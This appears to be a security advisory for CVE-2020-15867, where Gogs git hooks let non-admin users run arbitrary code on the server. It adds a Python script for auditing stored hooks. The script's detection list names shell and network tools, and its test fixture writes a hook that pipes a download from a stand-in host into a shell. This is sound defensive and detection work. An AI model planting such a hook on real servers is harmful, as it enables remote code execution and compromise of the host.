PT-2020-14674 · Gogs · Gogs

Published

2020-10-16

·

Updated

2022-04-26

·

CVE-2020-15867

CVSS v3.1

7.2

High

Vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: Gogs versions 0.5.5 through 0.12.2
Description: The git hook feature in Gogs lets a user who has been granted access to a repository's hook settings store an arbitrary script that the server executes on push, which amounts to authenticated remote code execution on the Gogs host under the account the service runs as. This becomes a privilege escalation when a site administrator grants the hook feature to a user without administrative privileges. The issue is notable because the documentation mentions the risk, but the UI does not warn the user that editing a hook means running arbitrary commands on the server.
Recommendations: For Gogs versions 0.5.5 through 0.12.2, restrict the git hook feature to administrative users only: do not grant the per-user hook permission to non-admin accounts, and review which accounts already hold it. As a temporary workaround, disable the git hook feature until a fixed version (later than 0.12.2, which is outside the stated affected range) can be deployed. Revoking the permission does not remove scripts that are already stored on disk, so also audit existing repositories for custom hooks that were added while the feature was exposed.
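The audit described above, as an added example that is not part of the advisory or of the Gogs project: a script that walks a repository root, reports every executable hook that is not a git `.sample` template or a recognised stock platform hook, and highlights hooks containing outbound-command or shell-spawning patterns. The repository layout (bare repos with a `hooks/` directory), the `PLATFORM_MARKERS` allowlist, the `SUSPICIOUS` indicator list and the fixture contents are assumptions constructed for illustration; tune the allowlist to the stock hook scripts the real server installs.

```python
"""Audit a Gogs (or any bare-git) repository root for custom hook scripts.

Added example, not Gogs project code. Assumptions: each repository's hooks
live in a directory named "hooks"; PLATFORM_MARKERS identifies the server's
own stock hooks; the fixture built by build_fixture() is constructed data.
"""
import shutil
import stat
import tempfile
from pathlib import Path

# Substrings that suggest a hook reaches out of the host or spawns a shell.
SUSPICIOUS = (
    "curl ", "wget ", "/dev/tcp/", "bash -i", "nc ", "ncat ",
    "base64 -d", "python -c", "perl -e", "sh -c",
)
# Text identifying the platform's own stock hooks (assumption: operator-supplied;
# if left empty, every executable hook is reported).
PLATFORM_MARKERS = ("/gogs hook ",)


def is_executable(path: Path) -> bool:
    """True for regular files with any execute bit set (git runs only those)."""
    mode = path.stat().st_mode
    return stat.S_ISREG(mode) and bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def classify_hook(path: Path) -> dict:
    """Describe one hook file: is it a stock platform hook, and what does it contain?"""
    text = path.read_text(errors="replace")
    return {
        "hook": str(path),
        "platform": any(m in text for m in PLATFORM_MARKERS),
        "indicators": [s for s in SUSPICIOUS if s in text],
        "size": len(text),
    }


def audit_hooks(root: Path) -> list:
    """Walk every hooks/ directory under root and report non-platform executable hooks.

    git's .sample templates are skipped. Subdirectories such as pre-receive.d/
    are included because delegating wrapper hooks execute their contents.
    """
    findings = []
    for hooks_dir in sorted(root.rglob("hooks")):
        if not hooks_dir.is_dir():
            continue
        for entry in sorted(hooks_dir.rglob("*")):
            if entry.name.endswith(".sample") or not is_executable(entry):
                continue
            finding = classify_hook(entry)
            if not finding["platform"]:
                findings.append(finding)
    return findings


def build_fixture() -> Path:
    """Constructed sample tree: one clean repo and one carrying a custom hook."""
    root = Path(tempfile.mkdtemp(prefix="gogs-repos-"))
    clean = root / "alice" / "docs.git" / "hooks"
    dirty = root / "mallory" / "tools.git" / "hooks"
    for d in (clean, dirty / "post-receive.d"):
        d.mkdir(parents=True)

    def write(path: Path, body: str, executable: bool = True) -> None:
        path.write_text(body)
        if executable:
            path.chmod(path.stat().st_mode | stat.S_IXUSR)

    # git's own template: skipped by the audit
    write(clean / "pre-receive.sample", "#!/bin/sh\necho sample\n")
    # stock platform delegate hooks (constructed marker): allowlisted
    write(clean / "pre-receive", "#!/bin/sh\n/opt/gogs/gogs hook pre-receive\n")
    write(dirty / "pre-receive", "#!/bin/sh\n/opt/gogs/gogs hook pre-receive\n")
    # a custom hook added by a non-admin: runs on the server at every push
    write(dirty / "post-receive.d" / "custom",
          "#!/bin/sh\ncurl -s http://example.invalid/payload | sh\n")
    # non-executable leftover: git will not run it, so it is not reported
    write(dirty / "update", "#!/bin/sh\necho disabled\n", executable=False)
    return root


if __name__ == "__main__":
    fixture = build_fixture()
    try:
        for f in audit_hooks(fixture):
            label = "SUSPICIOUS" if f["indicators"] else "custom"
            print(f"{label:10} {f['hook']}  {f['indicators']}")
    finally:
        shutil.rmtree(fixture)
```

Run it against the real repository root (for example `audit_hooks(Path("/home/git/gogs-repositories"))`) as the service account, and treat every reported hook as something to review with the repository owner; the indicator list only prioritises, it does not prove a hook is benign when it matches nothing.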


Related Identifiers

CVE-2020-15867

Affected Products

Gogs